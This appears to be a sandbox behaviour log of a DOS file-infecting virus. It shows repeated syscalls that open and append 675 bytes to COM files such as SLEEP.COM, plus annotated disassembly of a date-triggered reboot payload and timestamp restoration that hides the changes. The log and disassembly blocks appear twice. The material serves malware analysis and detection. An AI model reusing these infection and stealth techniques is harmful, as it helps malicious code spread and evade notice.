2018-12-25T11:59:43.249797914Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.261318066Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.269373933Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.272572062Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.274493884Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.278163449Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.288085038Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.290281645Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.299691255Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.312004445Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.31513382Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.32298471Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.331745967Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.334267225Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.346869945Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.356082847Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.359116742Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.360594632Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.363851075Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.373300142Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.374978982Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.384255181Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.395079613Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.398075014Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.405903012Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.413736664Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.417111832Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.423124377Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.429088287Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.432468869Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.434593381Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.438569871Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.45496888Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.456694755Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.459690888Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.464533404Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.467359816Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.475006747Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.482399719Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.484331351Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.49574175Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.507308581Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.510293697Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.512362811Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.515080943Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.525226809Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.527938488Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.537491555Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.54960943Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.553773316Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.562257056Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.56933969Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.571721699Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.59387943Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.601034403Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.604079097Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.606248771Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.608967254Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.618531567Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.621073228Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.629310702Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.639999299Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.643895385Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.651236767Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.658327236Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.661192136Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.66412178Z 59 PC: 12ac0 | Change current directory
; Disassembly window the sandbox printed at the return address of the "Get date"
; call logged on the next row (16-bit real-mode DOS code, Intel operand order).
; It shows a date-gated branch followed by the clean-up path taken in this run.
; Defensive takeaway: the gated path ends in a jump to the CPU reset entry point,
; so behaviour depends on the system date; a sandbox run with a pinned clock
; (see the JSON line after this log) exercises only one side of the branch.
2018-12-25T11:59:43.66883332Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4 ; AL = day of week from INT 21h/AH=2Ah (0 = Sunday, so 4 = Thursday)
0x12ac8: jne 0x12ae0 ; any other weekday: skip to the clean-up path
0x12aca: cmp dh, 0xe ; DH = month as returned by AH=2Ah
0x12acd: ja 0x12ae0 ; unsigned "above 14" cannot hold for a valid month; NOTE(review): may have been meant for DL (day of month) - confirm
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax ; DS = 0040h, the BIOS data area segment
0x12ad4: mov word ptr [0x72], 0 ; 0040:0072 is the BIOS reset flag (1234h requests a warm boot); 0 leaves a full power-on self test
0x12ada: ljmp 0xffff:0 ; far jump to FFFF:0000, the reset entry point: the machine reboots
0x12adf: retf ; not reached after the far jump above
; --- clean-up path; the next logged call is at PC 12ae9, so this run branched here ---
0x12ae0: mov ax, 0x2524 ; AH=25h set interrupt vector, AL=24h (decimal 36) = INT 24h, the DOS critical-error handler; the log's "Set random record number" label is the name of INT 21h function 24h, not of this vector
0x12ae3: lds dx, ptr [bp + 0x446] ; DS:DX = far pointer stored at bp+0x446; presumably the handler saved by the "Get interrupt vector" call at PC 12a8e
0x12ae7: int 0x21 ; logged as "Set interrupt vector" (PC 12ae9)
0x12ae9: push cs
0x12aea: pop ds ; DS = CS again after LDS changed it
0x12aeb: lea dx, word ptr [bp + 0x3c2] ; DS:DX = path buffer at bp+0x3c2; presumably filled by "Get current directory" at PC 12aaa
0x12aef: mov ah, 0x3b ; INT 21h AH=3Bh: change current directory
0x12af1: int 0x21 ; logged as "Change current directory" (PC 12af3)
0x12af3: mov dx, 0x80 ; offset 80h; NOTE(review): in a .COM program this is the default DTA inside the PSP - confirm DS
0x12af6: call 0x12c4b ; 0x12c4b begins with mov ah, 0x1a (set disk transfer address); logged at PC 12c4f
0x12af9: cmp sp, 0x4b50 ; window ends here; purpose of this compare is not visible
2018-12-25T11:59:43.671975013Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.673430832Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:43.675623622Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":6496,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:43.431751452Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:43.433879824Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.435280753Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.436733624Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:43.440086313Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:43.446846827Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:43.451461752Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:43.455795007Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:43.462799269Z 62 PC: 12b51 | Close file
2018-12-25T11:59:43.465344268Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:43.484764546Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.49832081Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:43.505802476Z 66 PC: 12c4a | Move file pointer
; Disassembly window the sandbox printed at the return address of the "Get time"
; call logged on the next row (16-bit real-mode DOS code, Intel operand order).
; It covers the tail of the per-file routine plus two small INT 21h helpers.
; Defensive takeaway: the file's date/time and attributes are written back after
; the 675-byte write, so mtime/attribute checks will not flag the modified file;
; compare file size or a content hash against a known-good copy instead.
2018-12-25T11:59:43.507645963Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0 ; DH = seconds returned by INT 21h/AH=2Ch
0x12c1e: je 0x12c17 ; seconds == 0: branch back to 0x12c17 (outside this window; presumably re-issues Get time)
0x12c20: mov byte ptr [bp + 0x3a5], dh ; keep the non-zero seconds byte at bp+0x3a5; NOTE(review): looks like a per-copy seed, confirm in 0x12c9d
0x12c24: call 0x12c9d ; body not shown; the "Write 675 bytes" row (PC 12cf9) is logged before control returns here
0x12c27: mov ax, 0x5701 ; INT 21h AX=5701h: set file date/time on the handle in BX
0x12c2a: mov cx, word ptr [bp + 0x418] ; CX = word at bp+0x418, passed as the file time
0x12c2e: mov dx, word ptr [bp + 0x41a] ; DX = word at bp+0x41a, passed as the file date
0x12c32: int 0x21 ; logged as "Get or set file date and time" (PC 12c34)
0x12c34: mov ah, 0x3e ; INT 21h AH=3Eh: close the handle in BX
0x12c36: int 0x21 ; logged as "Close file" (PC 12c38)
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417] ; CX = byte at bp+0x417; offsets 0x417/0x418/0x41a are spaced like the attr/time/date fields of a find-first DTA record - TODO confirm
0x12c3e: call 0x12c5a ; body not shown; the next "Get or set file attributes" row is at PC 12c63, presumably inside this routine
0x12c41: ret
; --- helper: INT 21h AH=42h (move file pointer) with offset CX:DX = 0; AL (origin) is left to the caller ---
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21 ; logged as "Move file pointer" (PC 12c4a)
0x12c4a: ret
; --- helper start: AH=1Ah is INT 21h "Set disk transfer address" (logged at PC 12c4f); the window ends here ---
0x12c4b: mov ah, 0x1a
2018-12-25T11:59:43.513535224Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:43.524256553Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:43.526039879Z 62 PC: 12c38 | Close file
2018-12-25T11:59:43.536435774Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.547791518Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.551234981Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.559969537Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.568307721Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.570417511Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.581419942Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.589184562Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.592464703Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.59435435Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.598659309Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.607846086Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.60986112Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.620407454Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.631820745Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.634831605Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.64272845Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.650438832Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.652398751Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.663787512Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.671140868Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.674216037Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.676083458Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.679085287Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.688663639Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.690657707Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.700038345Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.710815547Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.713766301Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.721381471Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.728219619Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.730321221Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.742073666Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.749768576Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.753250187Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.75637691Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.760209992Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.771529085Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.774837752Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.78321849Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.794528955Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.798420766Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.805808665Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.813064861Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.816183333Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.821116178Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.827491668Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.83087523Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.833062136Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.83582443Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.847642848Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.849732433Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.851578084Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.856345237Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.859583218Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.866717747Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.873709322Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.877063879Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.888737103Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.897407167Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.90205483Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.90376167Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.906471435Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.916377049Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.91849914Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.927395603Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.938398921Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.9421877Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.950882123Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.958121508Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.960386223Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.971132496Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.978538009Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.982386983Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.984047267Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.987441529Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.997479314Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.99896616Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.007712982Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.019933266Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.023209097Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.031066647Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.039483819Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.042329872Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.045479969Z 59 PC: 12ac0 | Change current directory
; Disassembly window the sandbox printed at the return address of the "Get date"
; call logged on the next row (16-bit real-mode DOS code, Intel operand order).
; It shows a date-gated branch followed by the clean-up path taken in this run.
; Defensive takeaway: the gated path ends in a jump to the CPU reset entry point,
; so behaviour depends on the system date; a sandbox run with a pinned clock
; (see the JSON line after this log) exercises only one side of the branch.
2018-12-25T11:59:44.051361541Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4 ; AL = day of week from INT 21h/AH=2Ah (0 = Sunday, so 4 = Thursday)
0x12ac8: jne 0x12ae0 ; any other weekday: skip to the clean-up path
0x12aca: cmp dh, 0xe ; DH = month as returned by AH=2Ah
0x12acd: ja 0x12ae0 ; unsigned "above 14" cannot hold for a valid month; NOTE(review): may have been meant for DL (day of month) - confirm
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax ; DS = 0040h, the BIOS data area segment
0x12ad4: mov word ptr [0x72], 0 ; 0040:0072 is the BIOS reset flag (1234h requests a warm boot); 0 leaves a full power-on self test
0x12ada: ljmp 0xffff:0 ; far jump to FFFF:0000, the reset entry point: the machine reboots
0x12adf: retf ; not reached after the far jump above
; --- clean-up path; the next logged call is at PC 12ae9, so this run branched here ---
0x12ae0: mov ax, 0x2524 ; AH=25h set interrupt vector, AL=24h (decimal 36) = INT 24h, the DOS critical-error handler; the log's "Set random record number" label is the name of INT 21h function 24h, not of this vector
0x12ae3: lds dx, ptr [bp + 0x446] ; DS:DX = far pointer stored at bp+0x446; presumably the handler saved by the "Get interrupt vector" call at PC 12a8e
0x12ae7: int 0x21 ; logged as "Set interrupt vector" (PC 12ae9)
0x12ae9: push cs
0x12aea: pop ds ; DS = CS again after LDS changed it
0x12aeb: lea dx, word ptr [bp + 0x3c2] ; DS:DX = path buffer at bp+0x3c2; presumably filled by "Get current directory" at PC 12aaa
0x12aef: mov ah, 0x3b ; INT 21h AH=3Bh: change current directory
0x12af1: int 0x21 ; logged as "Change current directory" (PC 12af3)
0x12af3: mov dx, 0x80 ; offset 80h; NOTE(review): in a .COM program this is the default DTA inside the PSP - confirm DS
0x12af6: call 0x12c4b ; 0x12c4b begins with mov ah, 0x1a (set disk transfer address); logged at PC 12c4f
0x12af9: cmp sp, 0x4b50 ; window ends here; purpose of this compare is not visible
2018-12-25T11:59:44.054357722Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.056050288Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:44.058410315Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":6496,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:43.444429815Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:43.446742659Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.448023941Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.449329601Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:43.452975011Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:43.459615005Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:43.466029471Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:43.473215678Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:43.48852951Z 62 PC: 12b51 | Close file
2018-12-25T11:59:43.490442865Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:43.513405949Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.520774105Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:43.527925641Z 66 PC: 12c4a | Move file pointer
; Disassembly window the sandbox printed at the return address of the "Get time"
; call logged on the next row (16-bit real-mode DOS code, Intel operand order).
; It covers the tail of the per-file routine plus two small INT 21h helpers.
; Defensive takeaway: the file's date/time and attributes are written back after
; the 675-byte write, so mtime/attribute checks will not flag the modified file;
; compare file size or a content hash against a known-good copy instead.
2018-12-25T11:59:43.529394423Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0 ; DH = seconds returned by INT 21h/AH=2Ch
0x12c1e: je 0x12c17 ; seconds == 0: branch back to 0x12c17 (outside this window; presumably re-issues Get time)
0x12c20: mov byte ptr [bp + 0x3a5], dh ; keep the non-zero seconds byte at bp+0x3a5; NOTE(review): looks like a per-copy seed, confirm in 0x12c9d
0x12c24: call 0x12c9d ; body not shown; the "Write 675 bytes" row (PC 12cf9) is logged before control returns here
0x12c27: mov ax, 0x5701 ; INT 21h AX=5701h: set file date/time on the handle in BX
0x12c2a: mov cx, word ptr [bp + 0x418] ; CX = word at bp+0x418, passed as the file time
0x12c2e: mov dx, word ptr [bp + 0x41a] ; DX = word at bp+0x41a, passed as the file date
0x12c32: int 0x21 ; logged as "Get or set file date and time" (PC 12c34)
0x12c34: mov ah, 0x3e ; INT 21h AH=3Eh: close the handle in BX
0x12c36: int 0x21 ; logged as "Close file" (PC 12c38)
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417] ; CX = byte at bp+0x417; offsets 0x417/0x418/0x41a are spaced like the attr/time/date fields of a find-first DTA record - TODO confirm
0x12c3e: call 0x12c5a ; body not shown; the next "Get or set file attributes" row is at PC 12c63, presumably inside this routine
0x12c41: ret
; --- helper: INT 21h AH=42h (move file pointer) with offset CX:DX = 0; AL (origin) is left to the caller ---
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21 ; logged as "Move file pointer" (PC 12c4a)
0x12c4a: ret
; --- helper start: AH=1Ah is INT 21h "Set disk transfer address" (logged at PC 12c4f); the window ends here ---
0x12c4b: mov ah, 0x1a
2018-12-25T11:59:43.533429365Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:43.543305043Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:43.545373093Z 62 PC: 12c38 | Close file
2018-12-25T11:59:43.554947425Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.565585801Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.568514564Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.576605143Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.583850763Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.585727664Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.596567812Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.603648295Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.606529912Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.607884439Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.610451588Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.620010645Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.622142684Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.63124448Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.647423598Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.650317206Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.657810137Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.665961686Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.668019512Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.680045323Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.687250162Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.690393183Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.69243548Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.695163302Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.704654907Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.706598713Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.714997734Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.725483078Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.728449109Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.737187685Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.744905353Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.746734281Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.762752574Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.775337722Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.778300641Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.780408528Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.783533486Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.792991921Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.795173322Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.803588144Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.814358023Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.818336332Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.826233927Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.834033397Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.836672886Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.843548171Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.849268005Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.852550533Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.854653914Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.857824847Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.869975342Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.872293464Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.874220159Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.878937097Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.882323896Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.889582421Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.897502857Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.900569716Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.910173175Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.91472251Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.917273772Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.918532996Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.920417649Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.927066768Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.928307082Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.933435165Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.940869415Z 79 PC: 12b32 | Find next file (See above)
